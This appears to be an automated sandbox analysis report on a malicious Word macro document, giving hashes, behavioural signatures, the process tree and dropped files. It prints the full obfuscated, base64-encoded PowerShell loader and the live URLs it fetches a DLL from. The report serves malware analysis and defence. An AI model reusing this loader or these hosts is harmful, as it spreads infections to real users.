Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
22-05-2022 05:17
Static task
static1
Behavioral task
behavioral1
Sample
akqzxikp.doc
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
akqzxikp.doc
Resource
win10v2004-20220414-en
General
-
Target
akqzxikp.doc
-
Size
154KB
-
MD5
40f79fcaa6e497435e1ac54f87fe90ab
-
SHA1
41acbe1239d7c21c6919033da6fd935db6ee1f58
-
SHA256
43af38ecd27585f00463abfee0ca7f492fb36fa862c8d215447d59be27652589
-
SHA512
93e3876bf713ea07d0302cc2f3432c0aa0365e2d3a5d2babe751a198fde4a0c9b4a080804166485e2843a0ec7e071b7748126bdd7d79472ede19c9fad3688d7a
Malware Config
Extracted
http://mediatorstewart.com/service-msc/3zZLr/
http://wolffsachs.com/wp-content/UKZw/
http://ycspreview.com/shubham/h7qna/
http://wi360.com/wp-content/u/
http://linkejet.com.br/cgi-bin/UQ/
http://nuocmambamuoi.vn/wp-admin/Ty/
http://ellinismos1922.gr/log/c99FG/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4432 4364 cmd.exe -
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 14 2952 powershell.exe 31 2952 powershell.exe 38 2952 powershell.exe 54 2952 powershell.exe 62 2952 powershell.exe 65 2952 powershell.exe 67 2952 powershell.exe 69 2952 powershell.exe 75 2952 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2272 WINWORD.EXE 2272 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2952 powershell.exe 2952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2952 powershell.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
WINWORD.EXEpid process 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE 2272 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 4432 wrote to memory of 3596 4432 cmd.exe msg.exe PID 4432 wrote to memory of 3596 4432 cmd.exe msg.exe PID 4432 wrote to memory of 2952 4432 cmd.exe powershell.exe PID 4432 wrote to memory of 2952 4432 cmd.exe powershell.exe PID 2952 wrote to memory of 4088 2952 powershell.exe rundll32.exe PID 2952 wrote to memory of 4088 2952 powershell.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\akqzxikp.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JABTAG8AOQBSAHEAIAAgAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiAC0ARgAgACcALgBpAE8ALgBkAEkAUgBFAEMAJwAsACcARQAnACwAJwBNACcALAAnAHMAeQBzAHQAJwAsACcAdABvAHIAWQAnACkAOwAgACAAIAAgACQAeQB4AE4AdAA2AG0APQBbAFQAWQBQAEUAXQAoACIAewAyAH0AewA1AH0AewAzAH0AewAxAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE0AQQBuAEEARwBlACcALAAnAE8ASQBOAFQAJwAsACcAcwB5AHMAdABlAE0ALgBOAGUAVAAuACcALAAnAEMAZQBwACcALAAnAHIAJwAsACcAUwBlAFIAVgBpACcAKQA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAJwArACcAbwBuACcAKQArACgAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAFQANQB1ADEAawAyAHQAPQAkAEwAMwAwAEcAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEMAMwAwAEkAOwAkAEUAXwAzAFkAPQAoACcAWAA4ACcAKwAnADAARwAnACkAOwAgACgAIAAgAFYAQQBSAEkAQQBCAGwAZQAgACgAJwBzAG8AOQByACcAKwAnAFEAJwApACAALQB2AGEAbABVAGUAbwBuACkAOgA6ACIAQwBSAGAAZQBBAHQARQBgAGQAaQBgAFIAYABlAGMAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AEkAJwArACgAJwAxADAAJwArACcAcAAwACcAKQArACcAegBzAHsAMAB9ACcAKwAnAEIAdABqAGcAaABxAGYAewAnACsAJwAwAH0AJwApAC0ARgAgACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQARQA0ADAASgA9ACgAJwBHADkAJwArACcAMgBPACcAKQA7ACAAIAAkAFkAeABOAHQANgBNADoAOgAiAFMAZQBgAEMAdQBgAFIAaQB0AHkAcABSAG8AVABvAGAAYwBgAG8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQAWQA0ADgASwA9ACgAKAAnAEIAMAAnACsAJwA0ACcAKQArACcARgAnACkAOwAkAEIAcAB0ADcAeQA1AHoAIAA9ACAAKAAoACcATQAnACsAJwAyADEAJwApACsAJwBZACcAKQA7ACQATgAxADIAUQA9ACgAKAAnAE0AJwArACcANAAyACcAKQArACcAUgAnACkAOwAkAFEAaQB4AHcAaABmADIAPQAkAEgATwBNAEUAKwAoACgAJwBzACcAKwAnAHoAJwArACcASgAnACsAJwBJADEAJwArACgAJwAwACcAKwAnAHAAMAB6AHMAJwApACsAKAAnAHMAJwArACcAegBKACcAKwAnAEIAdABqAGcAaAAnACsAJwBxACcAKQArACgAJwBmAHMAJwArACcAegBKACcAKQApACAAIAAtAEMAcgBFAHAATABBAEMAZQAgACgAWwBDAEgAYQByAF0AMQAxADUAKwBbAEMASABhAHIAXQAxADIAMgArAFsAQwBIAGEAcgBdADcANAApACwAWwBDAEgAYQByAF0AOQAyACkAKwAkAEIAcAB0ADcAeQA1AHoAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABDADUANgBJAD0AKAAoACcASAAnACsAJwAxADMAJwApACsAJwBWACcAKQA7ACQASABnAGIAMAB5AGIAMAA9ACgAJwBdACcAKwAoACcAZQAnACsAJwAxAHIAJwApACsAKAAnAFsAUwAnACsAJwA6AC8ALwAnACsAJwBtAGUAJwApACsAJwBkAGkAJwArACgAJwBhAHQAbwAnACsAJwByAHMAdABlACcAKwAnAHcAYQAnACkAKwAnAHIAJwArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AJwArACcAcwBlACcAKQArACgAJwByAHYAaQBjACcAKwAnAGUALQBtACcAKwAnAHMAYwAnACkAKwAoACcALwAnACsAJwAzAHoAWgBMAHIALwAnACsAJwBAACcAKQArACcAXQAnACsAKAAnAGUAMQByAFsAUwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwBvAGwAJwApACsAKAAnAGYAJwArACcAZgBzAGEAYwBoACcAKQArACgAJwBzAC4AYwAnACsAJwBvAG0AJwArACcALwB3ACcAKQArACcAcAAtACcAKwAnAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwBVAEsAJwArACcAWgAnACkAKwAnAHcALwAnACsAJwBAAF0AJwArACgAJwBlACcAKwAnADEAcgBbACcAKQArACcAUwAnACsAKAAnADoAJwArACcALwAnACsAJwAvAHkAYwBzACcAKQArACcAcAByACcAKwAnAGUAJwArACgAJwB2ACcAKwAnAGkAZQB3AC4AJwApACsAKAAnAGMAJwArACcAbwBtACcAKQArACcALwBzACcAKwAnAGgAJwArACcAdQBiACcAKwAoACcAaABhAG0ALwBoADcAJwArACcAcQBuACcAKQArACgAJwBhAC8AJwArACcAQABdAGUAJwApACsAJwAxACcAKwAoACcAcgAnACsAJwBbAFMAJwArACcAOgAvAC8AdwAnACkAKwAoACcAaQAzACcAKwAnADYAJwArACcAMAAuAGMAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtAGMAJwArACcAbwBuAHQAZQBuACcAKQArACgAJwB0ACcAKwAnAC8AdQAvAEAAJwApACsAKAAnAF0AJwArACcAZQAxAHIAWwAnACsAJwBTACcAKQArACgAJwA6AC8ALwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAG4AawBlACcAKwAnAGoAJwApACsAJwBlAHQAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtACcAKwAnAC4AYgByAC8AYwBnAGkALQAnACsAJwBiACcAKQArACcAaQBuACcAKwAoACcALwBVAFEALwBAAF0AJwArACcAZQAxACcAKwAnAHIAJwArACcAWwBTADoAJwArACcALwAnACkAKwAoACcALwBuAHUAbwAnACsAJwBjACcAKQArACgAJwBtAGEAJwArACcAbQBiAGEAJwApACsAJwBtAHUAJwArACcAbwBpACcAKwAnAC4AdgAnACsAKAAnAG4AJwArACcALwB3ACcAKQArACgAJwBwACcAKwAnAC0AYQBkACcAKQArACgAJwBtACcAKwAnAGkAbgAnACkAKwAoACcALwBUAHkAJwArACcALwAnACkAKwAoACcAQABdAGUAJwArACcAMQAnACkAKwAoACcAcgBbACcAKwAnAFMAJwApACsAKAAnADoALwAvAGUAJwArACcAbABsACcAKQArACgAJwBpAG4AJwArACcAaQBzACcAKQArACcAbQBvACcAKwAoACcAcwAnACsAJwAxADkAJwApACsAJwAyACcAKwAoACcAMgAuACcAKwAnAGcAcgAvACcAKwAnAGwAbwBnAC8AJwArACcAYwA5ACcAKQArACcAOQBGACcAKwAnAEcALwAnACkALgAiAHIARQBwAGAAbABBAEMARQAiACgAKAAoACcAXQBlADEAJwArACcAcgBbACcAKQArACcAUwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABwAEwAaQBUACIAKAAkAFcANAA5AFIAIAArACAAJABUADUAdQAxAGsAMgB0ACAAKwAgACQAQgA1ADgAQQApADsAJABCADMAMABXAD0AKAAoACcARgAnACsAJwA4ADYAJwApACsAJwBGACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBiAGYAOAA0ADMAeQAgAGkAbgAgACQASABnAGIAMAB5AGIAMAApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAcwB5AHMAdABlAE0ALgBuAGUAdAAuAFcAZQBiAEMATABJAGUAbgBUACkALgAiAGQAYABPAGAAVwBOAGwAbwBBAGQAZgBJAEwAZQAiACgAJABRAGIAZgA4ADQAMwB5ACwAIAAkAFEAaQB4AHcAaABmADIAKQA7ACQAUQAyADEATAA9ACgAJwBSADQAJwArACcAXwBZACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGkAeAB3AGgAZgAyACkALgAiAEwAZQBuAEcAYABUAEgAIgAgAC0AZwBlACAANAA5ADMAMwA4ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFEAaQB4AHcAaABmADIALAAoACgAJwBDAG8AJwArACcAbgB0AHIAbwAnACsAJwBsACcAKwAnAF8AUgAnACkAKwAnAHUAbgAnACsAKAAnAEQAJwArACcATABMACcAKQApAC4AIgB0AE8AcwBUAGAAUgBpAE4ARwAiACgAKQA7ACQAVwAzADAAUQA9ACgAKAAnAEcAJwArACcANQA5ACcAKQArACcASAAnACkAOwBiAHIAZQBhAGsAOwAkAFEAMgA4AFcAPQAoACcATAA4ACcAKwAnAF8AQgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AMQA5AEsAPQAoACcASAAnACsAKAAnADQAJwArACcANgBFACcAKQApAA==1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD JABTAG8AOQBSAHEAIAAgAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiAC0ARgAgACcALgBpAE8ALgBkAEkAUgBFAEMAJwAsACcARQAnACwAJwBNACcALAAnAHMAeQBzAHQAJwAsACcAdABvAHIAWQAnACkAOwAgACAAIAAgACQAeQB4AE4AdAA2AG0APQBbAFQAWQBQAEUAXQAoACIAewAyAH0AewA1AH0AewAzAH0AewAxAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE0AQQBuAEEARwBlACcALAAnAE8ASQBOAFQAJwAsACcAcwB5AHMAdABlAE0ALgBOAGUAVAAuACcALAAnAEMAZQBwACcALAAnAHIAJwAsACcAUwBlAFIAVgBpACcAKQA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAJwArACcAbwBuACcAKQArACgAJwB0AGkAJwArACcAbgB1AGUAJwApACkAOwAkAFQANQB1ADEAawAyAHQAPQAkAEwAMwAwAEcAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEMAMwAwAEkAOwAkAEUAXwAzAFkAPQAoACcAWAA4ACcAKwAnADAARwAnACkAOwAgACgAIAAgAFYAQQBSAEkAQQBCAGwAZQAgACgAJwBzAG8AOQByACcAKwAnAFEAJwApACAALQB2AGEAbABVAGUAbwBuACkAOgA6ACIAQwBSAGAAZQBBAHQARQBgAGQAaQBgAFIAYABlAGMAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AEkAJwArACgAJwAxADAAJwArACcAcAAwACcAKQArACcAegBzAHsAMAB9ACcAKwAnAEIAdABqAGcAaABxAGYAewAnACsAJwAwAH0AJwApAC0ARgAgACAAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQARQA0ADAASgA9ACgAJwBHADkAJwArACcAMgBPACcAKQA7ACAAIAAkAFkAeABOAHQANgBNADoAOgAiAFMAZQBgAEMAdQBgAFIAaQB0AHkAcABSAG8AVABvAGAAYwBgAG8ATAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQAWQA0ADgASwA9ACgAKAAnAEIAMAAnACsAJwA0ACcAKQArACcARgAnACkAOwAkAEIAcAB0ADcAeQA1AHoAIAA9ACAAKAAoACcATQAnACsAJwAyADEAJwApACsAJwBZACcAKQA7ACQATgAxADIAUQA9ACgAKAAnAE0AJwArACcANAAyACcAKQArACcAUgAnACkAOwAkAFEAaQB4AHcAaABmADIAPQAkAEgATwBNAEUAKwAoACgAJwBzACcAKwAnAHoAJwArACcASgAnACsAJwBJADEAJwArACgAJwAwACcAKwAnAHAAMAB6AHMAJwApACsAKAAnAHMAJwArACcAegBKACcAKwAnAEIAdABqAGcAaAAnACsAJwBxACcAKQArACgAJwBmAHMAJwArACcAegBKACcAKQApACAAIAAtAEMAcgBFAHAATABBAEMAZQAgACgAWwBDAEgAYQByAF0AMQAxADUAKwBbAEMASABhAHIAXQAxADIAMgArAFsAQwBIAGEAcgBdADcANAApACwAWwBDAEgAYQByAF0AOQAyACkAKwAkAEIAcAB0ADcAeQA1AHoAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABDADUANgBJAD0AKAAoACcASAAnACsAJwAxADMAJwApACsAJwBWACcAKQA7ACQASABnAGIAMAB5AGIAMAA9ACgAJwBdACcAKwAoACcAZQAnACsAJwAxAHIAJwApACsAKAAnAFsAUwAnACsAJwA6AC8ALwAnACsAJwBtAGUAJwApACsAJwBkAGkAJwArACgAJwBhAHQAbwAnACsAJwByAHMAdABlACcAKwAnAHcAYQAnACkAKwAnAHIAJwArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AJwArACcAcwBlACcAKQArACgAJwByAHYAaQBjACcAKwAnAGUALQBtACcAKwAnAHMAYwAnACkAKwAoACcALwAnACsAJwAzAHoAWgBMAHIALwAnACsAJwBAACcAKQArACcAXQAnACsAKAAnAGUAMQByAFsAUwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwBvAGwAJwApACsAKAAnAGYAJwArACcAZgBzAGEAYwBoACcAKQArACgAJwBzAC4AYwAnACsAJwBvAG0AJwArACcALwB3ACcAKQArACcAcAAtACcAKwAnAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwBVAEsAJwArACcAWgAnACkAKwAnAHcALwAnACsAJwBAAF0AJwArACgAJwBlACcAKwAnADEAcgBbACcAKQArACcAUwAnACsAKAAnADoAJwArACcALwAnACsAJwAvAHkAYwBzACcAKQArACcAcAByACcAKwAnAGUAJwArACgAJwB2ACcAKwAnAGkAZQB3AC4AJwApACsAKAAnAGMAJwArACcAbwBtACcAKQArACcALwBzACcAKwAnAGgAJwArACcAdQBiACcAKwAoACcAaABhAG0ALwBoADcAJwArACcAcQBuACcAKQArACgAJwBhAC8AJwArACcAQABdAGUAJwApACsAJwAxACcAKwAoACcAcgAnACsAJwBbAFMAJwArACcAOgAvAC8AdwAnACkAKwAoACcAaQAzACcAKwAnADYAJwArACcAMAAuAGMAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtAGMAJwArACcAbwBuAHQAZQBuACcAKQArACgAJwB0ACcAKwAnAC8AdQAvAEAAJwApACsAKAAnAF0AJwArACcAZQAxAHIAWwAnACsAJwBTACcAKQArACgAJwA6AC8ALwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAG4AawBlACcAKwAnAGoAJwApACsAJwBlAHQAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtACcAKwAnAC4AYgByAC8AYwBnAGkALQAnACsAJwBiACcAKQArACcAaQBuACcAKwAoACcALwBVAFEALwBAAF0AJwArACcAZQAxACcAKwAnAHIAJwArACcAWwBTADoAJwArACcALwAnACkAKwAoACcALwBuAHUAbwAnACsAJwBjACcAKQArACgAJwBtAGEAJwArACcAbQBiAGEAJwApACsAJwBtAHUAJwArACcAbwBpACcAKwAnAC4AdgAnACsAKAAnAG4AJwArACcALwB3ACcAKQArACgAJwBwACcAKwAnAC0AYQBkACcAKQArACgAJwBtACcAKwAnAGkAbgAnACkAKwAoACcALwBUAHkAJwArACcALwAnACkAKwAoACcAQABdAGUAJwArACcAMQAnACkAKwAoACcAcgBbACcAKwAnAFMAJwApACsAKAAnADoALwAvAGUAJwArACcAbABsACcAKQArACgAJwBpAG4AJwArACcAaQBzACcAKQArACcAbQBvACcAKwAoACcAcwAnACsAJwAxADkAJwApACsAJwAyACcAKwAoACcAMgAuACcAKwAnAGcAcgAvACcAKwAnAGwAbwBnAC8AJwArACcAYwA5ACcAKQArACcAOQBGACcAKwAnAEcALwAnACkALgAiAHIARQBwAGAAbABBAEMARQAiACgAKAAoACcAXQBlADEAJwArACcAcgBbACcAKQArACcAUwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABwAEwAaQBUACIAKAAkAFcANAA5AFIAIAArACAAJABUADUAdQAxAGsAMgB0ACAAKwAgACQAQgA1ADgAQQApADsAJABCADMAMABXAD0AKAAoACcARgAnACsAJwA4ADYAJwApACsAJwBGACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBiAGYAOAA0ADMAeQAgAGkAbgAgACQASABnAGIAMAB5AGIAMAApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAcwB5AHMAdABlAE0ALgBuAGUAdAAuAFcAZQBiAEMATABJAGUAbgBUACkALgAiAGQAYABPAGAAVwBOAGwAbwBBAGQAZgBJAEwAZQAiACgAJABRAGIAZgA4ADQAMwB5ACwAIAAkAFEAaQB4AHcAaABmADIAKQA7ACQAUQAyADEATAA9ACgAJwBSADQAJwArACcAXwBZACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGkAeAB3AGgAZgAyACkALgAiAEwAZQBuAEcAYABUAEgAIgAgAC0AZwBlACAANAA5ADMAMwA4ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFEAaQB4AHcAaABmADIALAAoACgAJwBDAG8AJwArACcAbgB0AHIAbwAnACsAJwBsACcAKwAnAF8AUgAnACkAKwAnAHUAbgAnACsAKAAnAEQAJwArACcATABMACcAKQApAC4AIgB0AE8AcwBUAGAAUgBpAE4ARwAiACgAKQA7ACQAVwAzADAAUQA9ACgAKAAnAEcAJwArACcANQA5ACcAKQArACcASAAnACkAOwBiAHIAZQBhAGsAOwAkAFEAMgA4AFcAPQAoACcATAA4ACcAKwAnAF8AQgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AMQA5AEsAPQAoACcASAAnACsAKAAnADQAJwArACcANgBFACcAKQApAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\I10p0zs\Btjghqf\M21Y.dll,Control_RunDLL3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\I10p0zs\Btjghqf\M21Y.dllFilesize
67KB
MD52a88b493cb6fe862b887d6316fad5a3d
SHA1f15dd8ce02fba26d776cfe70f4884b84d92f3448
SHA2560e56b79f74d3cb96da47d2d2dc0234b52eb9c83707d1005c2ff05740626feded
SHA51262d7f0dbc915f13b100841823aad6384f66c2b06630f9bc36900a746bde7631a4ba93ff1efeecb0117394efb15d762bed9f69a2eb6250ff20f9ea4bb341a37d1
-
memory/2272-134-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/2272-132-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/2272-133-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/2272-130-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/2272-146-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/2272-136-0x00007FF81B520000-0x00007FF81B530000-memory.dmpFilesize
64KB
-
memory/2272-131-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/2272-145-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/2272-135-0x00007FF81B520000-0x00007FF81B530000-memory.dmpFilesize
64KB
-
memory/2272-144-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/2272-147-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/2952-139-0x0000022130930000-0x0000022130952000-memory.dmpFilesize
136KB
-
memory/2952-140-0x00007FF8321F0000-0x00007FF832CB1000-memory.dmpFilesize
10.8MB
-
memory/2952-138-0x0000000000000000-mapping.dmp
-
memory/3596-137-0x0000000000000000-mapping.dmp
-
memory/4088-141-0x0000000000000000-mapping.dmp